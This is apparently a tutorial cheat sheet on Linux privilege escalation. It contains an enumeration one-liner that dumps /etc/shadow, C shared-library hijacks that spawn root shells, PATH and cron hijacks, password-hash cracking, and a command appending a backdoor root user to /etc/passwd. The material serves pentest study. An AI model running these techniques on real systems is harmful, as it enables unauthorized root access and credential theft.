# Linux Manual Exploitation ## Linux privesc in brief * sudo -l * Kernel Exploits * OS Exploits * Password reuse (mysql, .bash\_history, 000-default.conf...) * Known binaries with suid flag and interactive (nmap) * Custom binaries with suid flag either using other binaries or with command execution * Writable files owned by root that get executed (cronjobs) * MySQL as root * Vulnerable services (chkrootkit, logrotate) * Writable /etc/passwd * Readable .bash\_history * SSH private key * Listening ports on localhost * /etc/fstab * /etc/exports * /var/mail * Process as other user (root) executing something you have permissions to modify * SSH public key + Predictable PRNG * apt update hooking (Pre-Invoke) * Capabilities ## File System * /root\ root user's home directory. Usually only accessible by root user. * /home\ user's directory. Good to remember user's names. * /etc\ system configuration files. passwd and shadow files are here. * /bin and /sbin\ System binaries. useful for telling you which commands you can run * /usr\ user's binaries and libraries can be found here, * /var\ Contains logs and if apache, web files can be found here. * /dev\ device drivers * /lib\ contain shared libraries * /boot\ files for booting the system * /mnt\ mount point for media * /proc\ contains processes marked as a file by process number * /tmp\ Holds temporary files and is usually globally readable/writable ## One liner Here you have an old linpeas version script in one line, **just copy and paste it**;) **The color filtering is not available in the one-liner** (the lists are too big) This one-liner is deprecated (I'm not going to update it any more), but it could be useful in some cases so it will remain here. The default file where all the data is stored is: */tmp/linPE* (you can change it at the beginning of the script) ``` file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system information...";printf $B"[*] "$RED"BASIC SYSTEM INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative system\n"$NC >> $file;(cat /proc/version || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATH\n"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Date\n"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo version\n"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?\n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Useful software?\n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilities\n"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environment\n"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Top and cleaned proccesses\n"$NC >> $file;ps aux 2>/dev/null | grep -v "\[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Services\n"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Different processes executed during 1 min (HTB)\n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; done; sort $file.tmp1 | uniq | grep -v "\[" | sed '/^.\{500\}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasks\n"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /etc/cron* 2>/dev/null >> $file;cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?\n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage information\n"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?\n"$NC >> $file;cat /etc/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?\n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering network information...";printf $B"[*] "$RED"NETWORK INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNS\n"$NC >> $file;cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightbours\n"$NC >> $file;cat /etc/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Ports\n"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?\n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering users information...";printf $B"[*] "$RED"USERS INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Me\n"$NC >> $file;(id || (whoami && groups)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l without password\n"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I have PGP keys?\n"$NC >> $file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusers\n"$NC >> $file;awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Login\n"$NC >> $file;w 2>/dev/null >> $file;last 2>/dev/null | tail >> $file;echo "" >> $file;printf $Y"[+] "$RED"Users with console\n"$NC >> $file;cat /etc/passwd 2>/dev/null | grep "sh$" >> $file;echo "" >> $file;printf $Y"[+] "$RED"All users\n"$NC >> $file;cat /etc/passwd 2>/dev/null | cut -d: -f1 >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering files information...";printf $B"[*] "$RED"INTERESTING FILES\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"SUID\n"$NC >> $file;find / -perm -4000 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"SGID\n"$NC >> $file;find / -perm -g=s -type f 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside \$HOME (limit 20)\n"$NC >> $file;ls -la $HOME 2>/dev/null | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"20 First files of /home\n"$NC >> $file;find /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside .ssh directory?\n"$NC >> $file;find /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"*sa_key* files\n"$NC >> $file;find / -type f -name "*sa_key*" -ls 2>/dev/null -exec ls -l {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"Mails?\n"$NC >> $file;ls -alh /var/mail/ /var/spool/mail/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"NFS exports?\n"$NC >> $file;cat /etc/exports 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Hashes inside /etc/passwd? Readable /etc/shadow or /etc/master.passwd?\n"$NC >> $file;grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null >> $file;cat /etc/shadow /etc/master.passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Readable /root?\n"$NC >> $file;ls -ahl /root/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Inside docker or lxc?\n"$NC >> $file;dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`;lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`;if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" >> $file; fi;if [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" >> $file; fi;echo "" >> $file;printf $Y"[+] "$RED"*_history, profile, bashrc, httpd.conf\n"$NC >> $file;find / -type f \( -name "*_history" -o -name "profile" -o -name "*bashrc" -o -name "httpd.conf" \) -exec ls -l {} \; 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"All hidden files (not in /sys/) (limit 100)\n"$NC >> $file;find / -type f -iname ".*" -ls 2>/dev/null | grep -v "/sys/" | head -n 100 >> $file;echo "" >> $file;printf $Y"[+] "$RED"What inside /tmp, /var/tmp, /var/backups\n"$NC >> $file;ls -a /tmp /var/tmp /var/backups 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Interesting writable Files\n"$NC >> $file;USER=`whoami`;HOME=/home/$USER;find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'| sort | uniq >> $file;for g in `groups`; do find / \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'; done >> $file;echo "" >> $file;printf $Y"[+] "$RED"Web files?(output limited)\n"$NC >> $file;ls -alhR /var/www/ 2>/dev/null | head >> $file;ls -alhR /srv/www/htdocs/ 2>/dev/null | head >> $file;ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head >> $file;ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head >> $file;echo "" >> $file;printf $Y"[+] "$RED"Backup files?\n"$NC >> $file;find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*back*" -o -name "*bck*" \) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find IPs inside logs\n"$NC >> $file;grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find 'password' or 'passw' string inside /home, /var/www, /var/log, /etc\n"$NC >> $file;grep -lRi "password\|passw" /home /var/www /var/log 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l (you need to puts the password and the result appear in console)\n"$NC >> $file;sudo -l; ``` ## Collecting Information ### **OS, Kernel & Hostname -** Important for kernel exploit This will print information about operating system and kernel related information , useful in **kernel exploitation** ``` cat /etc/lsb-release cat /etc/issue cat /proc/version hostname uname -a ``` ### Users **-** /etc/passwd The passwd file stores essential user account information required during login. The passwd file is stored in the /etc directory and contains information such as the user ID, group ID, home directory and the path to the command shell. An ‘x’ character means that the encrypted password is stored in the /etc/shadow file. The following commands can be used to retrieve information about the current user and active session: ``` cat /etc/passwd id who w ``` ### Network Information **Network Adapters** - Will print adapter target connected with , this will give us insight of how many networks are connected with box and also information about internal network if available ``` ifconfig ip a ``` **Print Routing tables** Information related different network routes , give us information about target network reach , useful in pivoting through different networks ``` route ``` **Print the active connections** This will list all connections going on withing target system , this way we can determine what services are running and will be useful for us to extract important information ``` netstat -antup ``` **Print the arp entries** ``` arp -e ``` **/proc/net/** more discreet, all the information given by the above commands can be found by looking into the files under /proc/net, and **this approach is less likely to trigger monitoring or other stuff** ``` cat /proc/net/* ``` ### **Application and Services** **Retrieve information about services** knowing which services are running with **root privileges** can be very important for priv esc because exploiting them will result in root-level access Service exploits can be found using Searchsploit, Google, and GitHub, just like with Kernel exploits. ``` ps aux ps aux | grep root ps aux | grep "^root" --version -v dpkg -l | grep # On Debian-like distributions, dpkg can show installed programs and their version rpm –qa | grep # On systems that use rpm, the following achieves the same ``` **To retrieve installed applications** important to check if any application that is installed vulnerable to any known exploits ``` dpkg -l # Debian OS rpm -qa # Fedora based OS pacman -Qe # Arch based OS pkginfo # SOlaris cd /var/db/pkg/ && ls -d */* # Gentoo ``` ## Sudoers Make sure you pay attention to the groups to which the privileged user belongs. One especially important group is the sudo (‘Super User Do’) group. A user that is a member of the sudo group is able to execute commands in the context of the root user without providing the root password – depending on the settings in the sudoer file you may only need to enter the password for the current user or none at all. ### **Useful commands** ``` # Run a program using sudo: sudo # Run a program as a specific user: sudo -u # List programs a user is allowed to run: sudo -l # Login as another user: sudo -i -u scriptmanager ``` If you are part of group and can run specified , check with that binary on how to liverage your access to gain root with that binary ### **LD\_PRELOAD** LD\_PRELOAD is an environment variable which can be set to the path of a shared object (.so) file. When set, the shared object will be loaded before any others. **By creating a custom shared object and creating an init() function, we can execute code as soon as the object is loaded.** **Exploitation -** **1.** Run `sudo -l` to check if **env\_keepoption** is set ![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-MklASnSuMt3KYr6PE7d%2F-MklCrWZUhymksTjBSNa%2Fimage.png?alt=media\&token=e99bc640-f2f3-4366-b08d-2ac6c37593d6) 2\. Create a file (**preload.c**) with the following contents: ``` #include #include #include void _init() { unsetenv("LD_PRELOAD"); setresuid(0,0,0); system("/bin/bash -p"); } ``` 3\. Compile preload.c to preload.so: ``` gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c ``` 4\. Run any allowed program using sudo, **while setting the LD\_PRELOAD environment variable to the full path of the preload.so file:** ``` sudo LD_PRELOAD=/tmp/preload.so apache2 ``` ### **LD\_LIBRARY\_PATH** The LD\_LIBRARY\_PATH environment variable contains a set of directories where shared libraries are searched for first. The `ldd` command can be used to print the shared libraries used by a program: `ldd /usr/sbin/apache2` By creating a shared library with the same name as one used by a program, and setting LD\_LIBRARY\_PATH to its parent directory, the program will load our shared library instead. **Exploitation -** **1.** Run `lld` against the apache2 program file - ``` $ ldd /usr/sbin/apache2 linux-vdso.so.1 => (0x00007fff063ff000) ... libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007f7d4199d000) libdl.so.2 => /lib/libdl.so.2 (0x00007f7d41798000) libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007f7d41570000) /lib64/ld-linux-x86-64.so.2 (0x00007f7d42e84000) ``` Hijacking shared objects using this method is hit or miss. Choose one from the list and try it **(libcrypt.so.1 seems to work well).** 2\. Create a file (**library\_path.c**) with the following contents: ``` #include #include static void hijack() __attribute__((constructor)); void hijack() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); system("/bin/bash -p"); } ``` 3\. Compile library\_path.c into libcrypt.so.1: ``` gcc -o libcrypt.so.1 -shared -fPIC library_path.c ``` 4\. Run apache2 using sudo, while setting the LD\_LIBRARY\_PATH environment variable to the current path (where we compiled library\_path.c): ``` sudo LD_LIBRARY_PATH=. apache2 ``` ## Cron Jobs * Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. * Cron jobs run with the security level of the user who owns them. ![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-Mkl-kuR6Zil7yJmc5aA%2F-Mkl0GyH0Gsr3kDfoLJD%2Fimage.png?alt=media\&token=a6f4fa2f-b825-4acf-9c17-00e42b221586) ``` cat /etc/crontab crontab -e ``` ### Weak File Permission Misconfiguration of file permissions associated with cron jobs can lead to easy privilege escalation. If we can write to a program or script which gets run as part of a cron job, we can replace it with our own code (Most of time reverse shell) ``` ls -la ``` ### PATH Environment Variable The crontab PATH environment variable is by default set to /usr/bin:/bin The PATH variable can be overwritten in the crontab file. If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job. **Steps to check -** 1\. First print $PATH variable to see if we can manipulate it according to our need ``` $ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games ``` 2\. Adding our own path to $PATH where we can write our own malicious binary , in this example **/tmp** directory ``` export PATH=/tmp:$PATH ``` it will add **/tmp** in front of **PATH variable** so now when cron job run , it will start looking for that particular binary through $PATH variable and since we put our own path in starting , it will first look for that file in that directory so we ned to put our own malicious binary with same name in our directory 3\. Put your malicious binary in directory which you added to $PATH ``` cd /tmp echo "/bin/bash" > chmod +x ``` ## /etc/shadow 1\. **If you are able to read this file ,** ``` head -n 1 /etc/shadow ``` 1\. Extract the root user's password 2\. Save the password hash in a file ``` echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVl XvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash.txt' ``` 3\. Crack the password hash using john ``` john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.t xt hash.txt ``` **2. If you have writable permission ,** **1.** Generate a new **SHA-512** password hash - ``` mkpasswd -m sha-512 newpassword ``` 2\. Edit the /etc/shadow and replace the root user’s password hash with the one we generated. ## /etc/passwd If you have writable permission - ``` openssl passwd "password" ``` 1\. Generate a password using **opnssl** 2\. Edit the /etc/passwd file and enter the hash in the second field of the root user row in the place of 'x' 3\. Or you can do it append a new row to it to create **an alternate root user** ``` echo "newroot:L9yLGxncbOROc:0:0:root:/root:/bin/bash" >> /etc/passwd ``` ## SUID - SGID ### Finding SUID and SGID ``` find / -perm -4000 2>/dev/null # Print all suid find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null # Print both SUID and SGID ``` If you get any unusual binary set with SUID or SGID bit , always check on to get exploitation steps to achieve root ### Shared Object Injection When a program is executed, it will try to load the shared objects it requires. By using a program called **strace**, we can track these system calls and **determine whether any shared objects were not found.** If we can write to the location the program tries to open, we can create a shared object and spawn a root shell when it is loaded. **Exploitation -** **1.** Find SUID/SGID files on the target: ``` $ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null ... -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so ... ``` The **suid-so** file should execute with root user permissions. 2\. Run `strace` on the SUID file: ``` $ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file" access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) ... open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory) ``` The libcalc.so shared object could not be found, and the program is looking in our user’s home directory, which we can write to. 3\. Create the /home/user/.config directory 4\. Create the file **libcalc.c** with the following contents: ``` #include #include static void inject() __attribute__((constructor)); void inject() { setuid(0); system("/bin/bash -p"); } ``` 5\. Compile **libcalc.c** into /home/user/.config/libcalc.so: ``` gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c ``` 6\. Run the **SUID** executable to get a root shell: ``` /usr/local/bin/suid-so ``` ## Path Manipulation It is very simple to view the Path of the relevant user with help of echo command. ``` $ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games ``` #### Exploitation - If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (root ideally) and that is **not loaded from a folder that is located previous** to your writable folder in $PATH. **Example -** we came with one suid that executing some other binaries ``` find / -perm -u=s -type f 2>/dev/null ``` ![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-MklNcTOHSzTy7LEy2eM%2F-MklOFbmqFXVSyxhmTlx%2Fimage.png?alt=media\&token=9171ed80-5e26-42c9-a9f3-f2d67fc85dfa) ![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-MklNcTOHSzTy7LEy2eM%2F-MklOJwIqcRI61NhLAIg%2Fimage.png?alt=media\&token=b4dadeeb-1f64-4e78-b26f-cd38673c66c6) so it's executing **/bin/ps** binary to get process status\ , so what we can do is , make our **own ps** binary containing malicious payload and execute it with adding PATH to it **Creating malicious binary -** ``` cd /tmp echo "/bin/bash" > ps chmod +x ps ``` **Exporting current path in front -** ``` echo $PATH export PATH=/tmp:$PATH ``` it will add **/tmp** in front of **PATH variable** so now if someone execute that binary it will try to run `ps` and thus our own ps binary executed giving us `root` access ## Passwords and configs ### Finding different information **Scan for password or credential word in files** ``` grep -rnw / -e 'password\|pass\|creds\|credentials' 2>/dev/null -i find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null ``` #### Find all directories which can be written to ``` find / -executable -writable -type d 2> /dev/null ``` **Find all writable files and readable files** ``` find /etc -maxdepth 1 -writable -type f # Search for writable files in /etc find /etc -maxdepth 1 -readable -type f # Search for readable files in /etc ``` ### Configs ``` ls -aRl /etc/ * awk '$1 ~ /w.$/' * grep -v lrwx 2>/dev/nullte cat /etc/issue{,.net} cat /etc/master.passwd cat /etc/group cat /etc/hosts cat /etc/crontab cat /etc/sysctl.conf for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons) cat /etc/resolv.conf cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.confcda cat /etc/inetd.conf cat /opt/lampp/etc/httpd.conf cat /etc/samba/smb.conf cat /etc/openldap/ldap.conf cat /etc/ldap/ldap.conf cat /etc/exports cat /etc/auto.master cat /etc/auto_master cat /etc/fstab find /etc/sysconfig/ -type f -exec cat {} \; ```